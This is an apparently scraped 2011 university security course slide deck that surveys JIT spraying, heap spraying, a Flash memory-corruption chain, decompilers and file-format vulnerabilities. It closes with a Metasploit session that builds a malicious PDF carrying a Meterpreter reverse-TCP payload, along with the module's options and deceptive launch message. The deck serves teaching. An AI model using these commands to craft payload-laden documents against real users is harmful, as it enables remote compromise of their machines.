Upload
augusta-hensley
View
219
Download
2
Embed Size (px)
Citation preview
EECS 354:A Survey of Techniques to Facilitate ExploitationJonathan FriedmanMax GoldmanBrian LangeJosiah MatlackAaron Steinfeld November 29, 2011
Overview
JIT Spraying Heap Spraying Application-specific Exploits Decompilers File Format Vulnerabilities Demo
JIT Spraying
Introduced by Dionysus Blazakis in 2010
Designed to overcome ASLR and DEP JIT is executable “Spraying” covers the heap in exploit code
Used in ActionScript code Predictable address space layout
Used by implementing the xor operation
JIT Spraying (cont)
var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )
03470069 B8 D9D0543C MOV EAX,3C54D0D90347006E 35 5890903C XOR EAX,3C90905803470073 35 6AF4593C XOR EAX,3C59F46A03470078 35 01C8903C XOR EAX,3C90C8010347007D 35 D930903C XOR EAX,3C9030D903470082 35 5B53533C XOR EAX,3C53535B
JIT Spraying (cont)
var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )
0347006A D9D0 FNOP0347006C 54 PUSH ESP0347006D 3C 35 CMP AL, 350347006F 58 POP EAX03470070 90 NOP03470071 90 NOP03470072 3C 35 CMP AL, 3503470074 6A F4 PUSH -0C03470076 59 POP ECX03470077 3C 35 CMP AL, 3503470079 01C8 ADD EAX, ECX0347007B 90 NOP0347007C 3C 35 CMP AL, 350347007E D930 FSTENV DS:[EAX ]
JIT Spraying (cont)
Defenses exist Signature detection▪ Looks for NOPs▪ High false-positive rate
Heuristics▪ Look at xored values ▪ Stateful▪ Look for short jumps
Heap Spraying
Modified heap overflow technique used to overcome address space randomization
Allocates “blocks” throughout heap containing a nop sled followed by malicious code
Increases the chance of malicious code being executed
Heap Spraying (cont)
NOZZLE: Heap Spraying Defense
Developed by Microsoft Research in 2008
Defends against heap spraying by:1. Scanning each individual object on
heap, looking for nop slides followed by shellcode
2. Looking for heaps with a high proportion of malicious objects
Application-specific Exploits
Exploit a vulnerability specific to an application to corrupt memory
Can be quite complex and difficult to prevent or debug
In order to help prevent these exploits, code should be tested extensively Error codes are your friend Check them
Application-specific Exploits (cont)
Example: Adobe Flash Can set a parameter to a negative value Guarantees a failed allocation whose return
value is never checked The program does pointer arithmetic between
this (now NULL) pointer and a user input value Allows user to write to memory But, this isn’t directly useful because the value
written is only marginally of the hacker’s choosing
So what do we do?
Application-specific Exploits (cont)
Example (cont): ActionScript VM Can also execute ActionScript from a Flash file ActionScript VM verifies its input by using bitmasks
from memory, but then executes them directly Overwriting these bitmasks with the previous
exploit allows us to execute unverified code Now save the EIP, replace it with selected pointer,
and execute a return to jump to that pointer (presumably at some shellcode loaded in the Flash file)
Then, restore the saved EIP and return like nothing happened
Decompilers
Decode the binary-file format Decode the machine instructions into
assembly code for that machine Perform semantic analysis to recover
some low-level data types such as long variables, and to simplify the decoded instructions based on their semantics
Decompilers (cont)
Store the information in a suitable intermediate representation If a suitable intermediate language is used, the next 2 steps can be used with any assembly language to generate any procedural HLL code.
Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.
Decompilers (cont)
Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level)
Perform type analysis to recover HLL data types such as arrays and structures.
Generate HLL code from the transformed intermediate code.
Decompilers (cont)
File Format VulnerabilitesIn the news… Duqu
Installer recently found in the form of a .doc file
iOS Jailbreaks Have taken
advantage of PDF and TIFF handling vulnerabilities
File Format Vulnerabilites (cont)At their most abstract level:
Things handle files. Specially craft the file, and you may be able to manipulate the thing.
Programs, OSs
Crash, reverse engineer, execute arbitrary code
Documents, images, videos
Why so popular?
1. They’re more stealthy.
2.They’re getting easier to do.
Tools of the Trade
File Format fuzzers 4f and Metasploit Brute-force
approach Metasploit can
also be used to automate attacks as usual for kids!
Prevention
1. Don’t be stupid.
2. Client-side antivirus
3. Keeping software up to date
PDF Exploit Using Metasploit
Metasploit can inject executable code into a .pdf file, which will launch on startup
Exploited on Windows XP SP3, with Adobe Reader 8.0 and below
Also works on Foxit Reader After exploiting the .pdf, the .exe
injection will run automatically
Exploit code
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost LHOST => localhost smsf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf INFILENAME => test.pdf msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started reverse handler [*] Reading in 'test.pdf'... [*] Parseing 'test.pdf'... [*] Parseing Successfull. [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Creating 'evil.pdf' file... [*] Generated output file
/home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf [*] Exploit completed, but no session was created.
Additional Options
EXENAME The Name of payload exe. FILENAME The output filename. (default: evil.pdf) INFILENAME The Input PDF filename. LAUNCH_MESSAGE The message to display in the File: area
(default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EXE::Custom Use custom exe instead of automatically generating a payload exe
EXE::FallBack Use the default template in case the specified one is missing
EXE::Inject Set to preserve the original EXE function EXE::OldMethod Set to use the substitution EXE generation method. EXE::Path The directory in which to look for the executable
template EXE::Template The executable template file name. EnableContextEncoding Use transient context when encoding payloads VERBOSE Enable detailed status messages WORKSPACE Specify the workspace for this module WfsDelay Additional delay when waiting for a session
DEMO